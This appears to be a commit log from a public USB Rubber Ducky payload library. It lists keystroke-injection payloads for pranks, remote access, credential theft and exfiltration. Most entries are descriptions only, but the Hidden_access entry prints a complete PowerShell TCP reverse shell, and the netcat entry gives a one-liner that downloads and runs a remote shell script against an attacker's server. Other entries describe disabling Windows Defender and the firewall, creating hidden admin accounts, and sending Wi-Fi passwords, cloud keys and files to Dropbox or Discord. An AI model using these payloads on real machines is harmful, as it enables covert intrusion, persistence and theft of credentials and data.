hak5/usbrubberducky-payloads

- payloads/library/general/Canary Duck/payload.txt
Canary Duck turns a USB Rubber Ducky into a Hardware Canary Token that will alert you to would be snoops and spies.
1. Go to https://canarytokens.org/generate and generate a 'web bug token' this will create a special URL that will instantly alert you via email when someone vists it.
2. Now open the Canary Token file in your fav text editor and change this line:
`STRING powershell -NoP -NonI -W Hidden -Exec Bypass Invoke-WebRequest "[CANARY URL HERE]"`
Replace [CANARY URL HERE] with your canary URL.
> Canary Duck

- library/payloads/remote_access/ReverseDucky.txt
Obfuscated powershell  tcp reverse shell, executed in the background.
Only fill in the IP Blocks of your attacking box, your port and you are good to go!
> ReverseDucky

- library/payloads/remote_access/ReverseDuckyII.txt
**ReverseDucky2** - A fast way to gain a reverse shell on the target via obfuscated powershell code
Faster and easier to configure than **ReverseDucky**
> Uploaded ReverseDuckyII

- payloads/library/remote_access/Netcat-Reverseshell-On-Log-In/payload.txt
Creates a powershell Job/Task to remotely connect to the computer with netcat every time user logs in
Setup:
Windows defender is required to be disabled
Have IP and port 87 open and listening on server side for netcat reverse shell
Create a txt file with the command below in it, replacing the ip to your servers ip:
IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 123.456.7.890 87
Host the text file online on github or your own web server or something
Then in the payload, replace https://example.com/txt/load.txt with the url that you are hosting your txt file in raw format
> Remote connect-back via netcat Powershell task upon login.

- payloads/library/prank/rickroll/payload.txt
Sneaky and brutal Rick Roll for Rubber Ducky. Works against Windows devices.
__Note that I don't have access to a ton of different Windows devices, so I'd recommend testing on your target platform before attempting to deploy this prank for real.__
1. After deploying to the victim's machine, the script won't run until the next time the victim unlocks their machine or restarts it.
2. It will also periodically turn the victim machine's volume to maximum, so even when they mute their volume it will quickly return to max.
3. It gets installed as a service in Task Scheduler, so even if they manage to find a way to kill the script it will still run again the next time the machine reboots.
> Rubber-Ducky_RickRoll

- payloads/library/remote_access/ReverseDucky/ReverseDucky.txt
Shorten the code to increase the speed
> Update ReverseDucky 1.1 to Version 1.2

- payloads/library/remote_access/persistentReverseDucky/payload.txt
Check out more at: https://github.com/drapl0n/persistentReverseDucky
> Created persistentReverseDucky

- payloads/library/credentials/DuckyLogger/payload.txt
Check out: https://github.com/drapl0n/DuckyLogger for usage and instructions.
> Uploaded DuckyLogger

- payloads/library/exfiltration/Public-IP-Grabber/payload.txt
Extracts the public IP address of the current connected network onto the ducky
> Added public ip grabber payload

- payloads/library/general/Ascii/Win_HID_MonaLisa/MonaLisa.txt
- payloads/library/general/Ascii/Win_HID_MonaLisa/readme.md
Open notepad and types out an ASCII art image of the Mona Lisa. Not the best payload in the world but it was the first one I ever made (around the mark 4 days).
> New Payload - Mona

- payloads/library/exfiltration/History-Grabber/payload.txt
Extracts the terminal history of the device onto the ducky
> Added terminal history grabber payload

- payloads/library/prank/macOS_rickroll/payload.txt
- Added a macOS version of the rickroll payload
> Added macOS rickroll payload

- payloads/library/exfiltration/Mail-Grabber/payload.txt
* iMessages the last received email in the Mail app to an iMessage number of your choice
> added mail grabber payload

- payloads/library/credentials/sudoSnatch/payload.txt
RubberDucky version, optimized and fast.
> uploaded sudoSnatch

- payloads/library/prank/Talking_Duck/payload.txt
Added:
-New prank payload called "Talking_Duck". It uses .NET SpeechSynthesizer to make the Windows computers talk.
> Talking_Duck Prank Payload

- payloads/library/prank/AUTOinCORRECT/payload.txt
- payloads/library/prank/A_Cagey_Takeover/payload.txt
2 new prank scripts:
1) A_Cagey_Takeover = Renames all files on Desktop to "nicholas-cage-(*digit*).takeover", and sets the background to an image of Nicholas Cage breaking through the screen
2) AUTOinCORRECT = sets a custom prank autocorrect rule for Microsoft word.
> A_Cagey_Takeover and AUTOinCORRECT

- payloads/library/exfiltration/Discord_Windows_Wifi_IP-Info/payload.txt
This is a way to upload loot/info to a Discord webhook.
> Added Discord exfiltration of wifi/info/ipv4 payload

- payloads/library/prank/Automailer/payload.txt
Payload I have created at work to annoy people who keep their devices unlocked.
> create new payload

- payloads/library/exfiltration/Poor_Mans_Nmap/payload.txt
PowerShell process was left open. Script takes approximately 1.5 seconds to scan a host, which means it should take ~27.3 hours to scan a class "B" subnet. Process now automatically closes after ~27.3 hours.
> Automatically close process in "Poor_Mans_Nmap"

- payloads/library/prank/Physical_Rick_Roll/payload.txt
Prank payload to add a physical CD copy of "The Best Of Rick Astley" to the target's Amazon basket/cart.
> Physical_Rick_Roll

- payloads/library/prank/silent_rickroll/payload.txt
unnecessarily long but easy to understand script using simple methods to achieve its goal and getting around some cmd/run dialogue locks
> silent_rickroll rev 1

- payloads/library/prank/YouHaveBeenQuacked2.0/payload.txt
REM Title: YouHaveBeenQuacked
REM Description: A speech synthesizer with the volume increased to 100% states "you have 
REM been quacked" followed by a browser image "You've Been Quacked!" and a "Quacked" 
REM Youtube video.
REM Target: Windows 10 (Powershell)
REM Props: Hak5
REM Version: 2.0
REM Category: Prank
REM This payload is based off the original Hak5 "QUACKED" payload, and was created for my REM own personal amusement as I'm not good at sharing. 
GUI r
DELAY 200
STRING powershell -windowstyle hidden
ENTER
DELAY 200
STRING $key=[Math]::Ceiling(100/2);$obj=New-Object -ComObject WScript.Shell;for($i=0;$i -lt $key;$i++){$obj.SendKeys([char] 175)}
ENTER
DELAY 500
STRING $sp=New-Object -ComObject SAPI.SpVoice
ENTER
DELAY 500
STRING $sp.Speak("you have been …
> You'veBeenQuacked-2.0

- payloads/library/prank/silent_rickroll/README.md
- payloads/library/prank/silent_rickroll/payload.txt
README.md provides a better description of the script as well as show the batch file code.
The script has been modified to run better and several problems have been solved, although minor adjustments could make it run faster if necessary
The creation of the batch file through the script had minor problems which have also been solved
> silent_rickroll Rev 2

- payloads/library/execution/Admin_Who_Never_Sleeps/ReadMe.md
- payloads/library/execution/Admin_Who_Never_Sleeps/payload.txt
- payloads/library/general/Defeat_Defender/ReadMe.md
- payloads/library/general/Defeat_Defender/payload.txt
A quick and simple script to create a hidden local admin then set power settings to never sleep.
> Admin Who Never Sleeps

- payloads/library/prank/YouHaveBeenQuacked2.0/payload.txt
REM Title: YouHaveBeenQuacked2.0
REM Description: A speech synthesizer with the volume increased to 100% states "you have been quacked" followed by a
REM browser image "You've Been Quacked!" and a "Quacked" Youtube video.
REM Target: Windows 10 (Powershell)
REM Props: Hak5
REM Version: 2.0
REM Category: Prank
REM This payload is based off the original Hak5 "QUACKED" payload, and was created for my own personal amusement ...
GUI r
DELAY 200
STRING powershell -windowstyle hidden
ENTER
DELAY 200
STRING $key=[Math]::Ceiling(100/2);$obj=New-Object -ComObject WScript.Shell;for($i=0;$i -lt $key;$i++){$obj.SendKeys([char] 175)}
ENTER
DELAY 500
STRING $sp=New-Object -ComObject SAPI.SpVoice
ENTER
DELAY 500
STRING $sp.Speak("you have been quacked.")
ENTER
DELAY 100
STRING …
> YouHaveBeenQuacked2.0

- payloads/library/incident_response/GoodUSB.txt
GoodUSB is a script that downloads ClamAV, updates it, and scans your system memory for malware and terminates any processes it finds.
> Added GoodUSB Payload

- payloads/library/prank/YouHaveBeenQuacked2.0/payload.txt
REM Title: YouHaveBeenQuacked
REM Description: A speech synthesizer with the volume increased to 100% states "you have 
REM been quacked" followed by a 
REM browser image "You've Been Quacked!" and a "Quacked"
REM Youtube video.
REM Target: Windows 10 (Powershell)
REM Props: Hak5
REM Version: 2.0
REM Category: Prank
REM This payload is based off the original Hak5 "QUACKED" payload. 
GUI r
DELAY 200
STRING powershell -windowstyle hidden
ENTER
DELAY 200
STRING $key=[Math]::Ceiling(100/2);$obj=New-Object -ComObject WScript.Shell;for($i=0;$i -lt $key;$i++){$obj.SendKeys([char] 175)}
ENTER
DELAY 500
STRING $sp=New-Object -ComObject SAPI.SpVoice
ENTER
DELAY 500
STRING $sp.Speak("you have been quacked.")
ENTER
DELAY 100
STRING start firefox …
> YouHaveBeenQuacked

- payloads/library/remote_access/Hidden_access/payload.txt
this is the rs.ps1 file that needs to be uploaded for the script to work
$client = New-Object System.Net.Sockets.TCPClient("{IP here}",{PORT HERE});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
> Reverse Shell

- payloads/library/prank/Quack_Rolled/payload.txt
REM Title: Quack_Rolled
REM Description: The first thing is volume is increased to 100%
REM Afterwards you get Rick Rolled Ducky Style.
REM Target: Windows 10 PowerShell
REM Props: Darren Kitchen and I am Jakoby
REM Version: 1.0
REM Category: Prank
DELAY 500
GUI r
DELAY 500
STRING powershell -windowstyle hidden
DELAY 500
ENTER
DELAY 500
STRING Function Set-SoundVolume
DELAY 500
ENTER
STRING {
DELAY 500
ENTER
STRING Param(
DELAY 500
ENTER
STRING [Parameter(Mandatory=$true)]
DELAY 500
ENTER
STRING [ValidateRange(0,100)]
DELAY 500
ENTER
STRING [Int]
DELAY 500
ENTER
STRING $volume
DELAY 500
ENTER
STRING )
DELAY 500
ENTER
DELAY 500
STRING $keyPresses = [Math]::Ceiling( $volume / 2 )
DELAY 500
ENTER
DELAY 500
STRING $obj = New-Object -ComObject WScript.Shell
DELAY …
> Quack_Rolled

- payloads/library/prank/TerminalRickRoll/QuackTUX.txt
- payloads/library/prank/TerminalRickRoll/QuackTUXmean.txt
- payloads/library/prank/TerminalRickRoll/README.md
> added terminal rickroll

- payloads/library/exfiltration/WIFIPASS-to-Dropbox/payload.txt
Grabs all wifi passwords and then uploads a txt file to your dopbox.
> WIFI PASSWORDS TO DROPBOX

- payloads/library/prank/the_f_bomb
it's f_ing hilarious - works on all windows machines with powershell
Been my go-to for a while - successful prank in less than 5 seconds
> The littlest payload known to duck-kind

- payloads/library/exfiltration/Win_Hid_ImgOverKey/payload.txt
- payloads/library/exfiltration/Win_Hid_ImgOverKey/readme.md
Proof of concept for send an image over key reflection using two methods of converting bytes to key presses.
> Image over key reflection

- payloads/library/general/Multi_HID_The-Penny-Drops/Payload.txt
- payloads/library/general/Multi_HID_The-Penny-Drops/readme.md
Little arcade coin drop / pachinko style game
> New Payload - The Penny Drops

- payloads/library/exfiltration/Dropbox-Bandit/ex-readable-src.ps1
- payloads/library/exfiltration/Dropbox-Bandit/ex.ps1
- payloads/library/exfiltration/Dropbox-Bandit/payload.txt
- payloads/library/exfiltration/Dropbox-Bandit/payload_duckyscript_old.txt
- payloads/library/exfiltration/Dropbox-Bandit/readme.md
(copied from readme.md)
This payload is designed to target Windows 10/11 machines, but but may run on older versions of Windows. If you are using an old Rubber Ducky, please use "payload_duckyscript_old.txt"
This payload extracts files from a specific location on a target's machine and uploads them in archives to a dropbox account. The actual payload takes about 5 seconds to run (faster on real machines, tested on virtual machine), but the actual exfiltration, which is invisible to the victim one started, can take longer depending on the total size of data to be uploaded. 
**Configuration:**
- Selects a folder (and thereby all subfolders) to extract files from
- Select filetype(s) or filename(s) to target
- Dropbox account to use
**Payload Anatomy:**
- The payload runs a hidden and …
> Added Payload: Dropbox Bandit

- payloads/library/general/OneDuckToQuackThemAll/Docs/gpl.txt
- payloads/library/general/OneDuckToQuackThemAll/Payload.txt
- payloads/library/general/OneDuckToQuackThemAll/readme.md
Initial version of selectable payloads for Hak5 rubber ducky using combination of button toggles and LED indicators with proof-of-concept attacks
> One Duck To Quack Them All

- payloads/library/credentials/Hasta lasagna!/Hasta Lasagna.ps1
1. Disable real time protection
2. Set smtp var
> Update Hasta Lasagna.ps1

- README.md
Fix the broken image link and add shop link
Update shop link
> Fix broken image and links in README

- payloads/library/prank/ProcessTerminator/payload.txt
- payloads/library/prank/ProcessTerminator/pt.ps1
Hidden PowerShell script that tirelessly hunts down user processes and terminates them
> ProcessTerminator Payload

- payloads/library/mobile/Android/Android_HID_BruteForceCode/BruteForce4.txt
- payloads/library/mobile/Android/Android_HID_BruteForceCode/BruteForce4Backspace.txt
- payloads/library/mobile/Android/Android_HID_BruteForceCode/readme.md
re-imagining of 1217.1 android brute force technique using just ducky script 3
> New Payload - Brute Force

- payloads/library/mobile/Android/Android_HID_BruteForceCode/readme.md
> Update - Spelling

- payloads/library/prank/Deshellerator/payload.txt
TITLE: Deshellerator
AUTHOR: Korben
VERSION: 1.0
DESCRIPTION: "Slow down there buckaroo" - Shell Decelerator
Every time a shell is opened (that sources ~/.bashrc), opening the next
shell will get ever so slightly slower...
TARGETS: Linux - tested on ubuntu
REQUIREMENTS: DuckyScript 3, PayloadStudio >1.3
> Deshellerator

- payloads/library/prank/Multi_HID_HeyGotAnyGrapes/payload.txt
- payloads/library/prank/Multi_HID_HeyGotAnyGrapes/readme.md
Multi OS CLI speak first verse of the duck song
> New Payload - Hey! Got Any Grapes?

- payloads/library/exfiltration/Windows-Product-Duckey/.ps1
- payloads/library/exfiltration/Windows-Product-Duckey/README.md
- payloads/library/exfiltration/Windows-Product-Duckey/old_payload.txt
- payloads/library/exfiltration/Windows-Product-Duckey/payload.txt
- payloads/library/exfiltration/Windows-Product-Duckey/source.ps1
This payload exfiltrate the target's Windows product key to a remote server.
> Added payload "Windows Product Duckey"

- payloads/library/prank/HTML_Fork-Bomb/payload.txt
Please let me know if it does not work, I ran the application command without the link to ensure it works
> change the browsers from IE to MSEDGE for newer windows systems

- payloads/library/remote_access/ReverseDuckyUltimate/payload.txt
- Added IF_DEFINED_TRUE in line 140
- Deleted the additional EXTENSION string
> Updated forgotten IF_DEFINED_TRUE

- payloads/library/prank/Set_VSCode_theme_light/README.md
- payloads/library/prank/Set_VSCode_theme_light/payload.txt
Hi I added a script that changes the VSCode theme to light mode through the UI. While of course having the danger of causing
* blindness
* dizzyness
* despair
I still put it in the prank category. I hope you enjoy!
> 😈 The most evil prank known to developers

- payloads/extensions/community/PowerShell_To_Dropbox.txt
This DuckyScript extension exfiltrates data (for example the result of a command) from the target computer by submitting a file to your Dropbox.
> Added extension "PowerShell_To_Dropbox"

- payloads/library/execution/Change_Windows_User_Name/README.md
- payloads/library/execution/Change_Windows_User_Name/payload.txt
This script can be used to change the windows user name.
> Change Windows User Name

- payloads/library/prank/The_Mouse_Moves_By_Itself/README.md
- payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt
- payloads/library/prank/The_Mouse_Moves_By_Itself/script.py
A script used to prank your friends with the mouse pointer.
> The Mouse Moves By Itself

- payloads/library/credentials/Simple_User_Password_Grabber/payload.txt
i just changed NO to NOT cuz it just made more sense
> Update payload.txt (grammar changes)

- payloads/library/prank/MaxVolumeRickroll_Windows/README.md
- payloads/library/prank/MaxVolumeRickroll_Windows/payload.txt
Simple rickroll for windows 10/11
> Max Volume Rickroll for Windows 10/11

- payloads/library/prank/Alien Message From Computer/payload.txt
Solved the reported bug in issue section #377
> Payload bug #377 fixed

- payloads/library/execution/Win_HID_InvisableDesktopFolder/payload.txt
- payloads/library/execution/Win_HID_InvisableDesktopFolder/readme.md
Creates a somewhat invisible folder on the desktop. Uses an invisible character for the name and a transparent icon. 
This targets the English version of Windows as it uses the underlined letters to select menu items and buttons.
> New Payload - Invisable Folder

- payloads/library/exfiltration/ExfiltrateCloudCreds/README.md
- payloads/library/exfiltration/ExfiltrateCloudCreds/payload.txt
Exfils Azure access token and AWS keys using respective CLI
> initial commit of cloud exfil script

- payloads/library/execution/Add_Local_Admin/payload.txt
This is a more streamline, version of the original payload...
> Add_Local_Admin v 3.0

- payloads/library/general/onemillioncheckboxes_checker/payload.txt
Automatically checks or unchecks boxes at a constant rate slow enough to not get throttled by the server. 
https://twitter.com/itseieio/status/1805986839058079896
> add onemillioncheckboxes.com checker payload

- payloads/extensions/community/RUN_HOSTED_POWERSHELL
- payloads/library/exfiltration/Windows-Privilege-Excalibur/README.md
- payloads/library/exfiltration/Windows-Privilege-Excalibur/payload.txt
- payloads/library/exfiltration/Windows-Product-Key-Grabber/README.md
- payloads/library/exfiltration/Windows-Product-Key-Grabber/payload.txt
Update 1 extension and 2 payloads
- Update "Run Hosted PowerShell" extension
- Update "Windows Privilege Excalibur" payload
- Update "Windows Product Key Grabber" payload
> Updates extensions and payloads

- payloads/library/general/1_Script_to_Rule_Them_All/ReadMe.md
- payloads/library/general/1_Script_to_Rule_Them_All/payload.txt
- payloads/library/prank/Hacker_Typer/payload.txt
- payloads/library/prank/Rick_Rolling_Forever/payload.txt
- payloads/library/prank/The_Matrix-Wake_Up/payload.txt
- Updated a handful to appease DS3 and make life easier
- Added a NEW payload (well, just Korben's combined with a minor tweak... 😂 )
> DS3 updates and a NEW PAYLOAD!

- payloads/library/execution/Firewall_Deactivator/README.md
- payloads/library/execution/Firewall_Deactivator/payload.txt
This payload is used to deactivate all firewalls on windows in a discrete manner.
Powershell will only open for a split second.
> Deactivate/Disable Windows Firewall

- payloads/library/general/USB-Poison/README.md
- payloads/library/general/USB-Poison/USB-Poison-Hidden.txt
- payloads/library/general/USB-Poison/USB-Poison.txt
- payloads/library/incident_response/Global-Powershell-Logging/Global-Powershell-Logging.ps1
- payloads/library/incident_response/Global-Powershell-Logging/Payload.txt
- payloads/library/incident_response/Global-Powershell-Logging/README.md
- payloads/library/remote_access/Discord-CLI/Discord-CLI-Hidden.txt
- payloads/library/remote_access/Discord-CLI/Discord-CLI.txt
- payloads/library/remote_access/Discord-CLI/README.md
I have added 3 payloads to [usbrubberducky-payloads](https://github.com/hak5/usbrubberducky-payloads) :
**Payloads**
- Discord-CLI : Gain a reverse shell on a target Windows PC using Discord's bot API as a command and control server.
- Global-Powershell-Logging : Log all powershell input and output to a text file in `Documents/WindowsPowershell` folder.
- USB-Poison : Copy a file or payload to any newly connected USB drives.
**Requirements**
- Discord-CLI : A Discord bot/app token, A discord server and channel setup.
- Global-Powershell-Logging : Administrator permissions are required for this script.
- USB-Poison : A specified file to copy.
*All payloads are tested and working on both Windows 10 and 11 (pro editions)*
> beigeworm's first hak5 payload submission!

- payloads/library/exfiltration/FileHunter/payload.txt
- payloads/library/exfiltration/FileHunter/readme.md
A payload to search for either a specific file or file type, to then compress these and exfiltrate them via the Ducky's Mass Storage functionality.
> Uploaded FileHunter

- payloads/library/incident_response/Global-Powershell-Logging/Global-Powershell-Logging.ps1
- payloads/library/prank/MEMZ-with-Powershell/Payload.txt
- payloads/library/prank/MEMZ-with-Powershell/Powershell-MEMZ.ps1
- payloads/library/prank/MEMZ-with-Powershell/README.md
- payloads/library/recon/Screenshare-Over-LAN/Payload.txt
- payloads/library/recon/Screenshare-Over-LAN/README.md
- payloads/library/recon/Screenshare-Over-LAN/Screenshare-Over-LAN.ps1
- payloads/library/recon/VM-Detection-Report/Payload.txt
- payloads/library/recon/VM-Detection-Report/README.md
- payloads/library/recon/VM-Detection-Report/VM-Detection-Report.ps1
1. [UPDATED] - Global-Powershell-Logging
Added a single grave character behind $transcriptdir on line 35. (escape character needed for literal path)
2. [ADDED] - Powershell-MEMZ
Display graphical artifacts similar to the original memz trojan.
3. [ADDED] - Screenshare-Over-LAN
Share the targets screen to any device on the network.
4. [ADDED] - VM-Detection-Report
Detect if a system hosts a virtual machine, or is a VM itself.
> Adding 3 more payloads and one edit to existing payload.

- payloads/library/credentials/Brave_Breacher/Brave_Breacher.txt
- payloads/library/credentials/Brave_Breacher/README.md
- payloads/library/exfiltration/edit2exfil/README.md
- payloads/library/exfiltration/edit2exfil/payload.txt
edit2exfil:
- Changed conditional else statement from `:` to `exit 0` so script will stop correctly if conditions are not met in `payload.txt` (readme updated to reflect changes).
- Changed `crontab` syntax so that script will be appended as a cronjob as opposed to over-writing existing cronjobs in `payload.txt` (readme updated to reflect changes).
Brave_Breacher:
- Grammar fixes.
> Code fixes
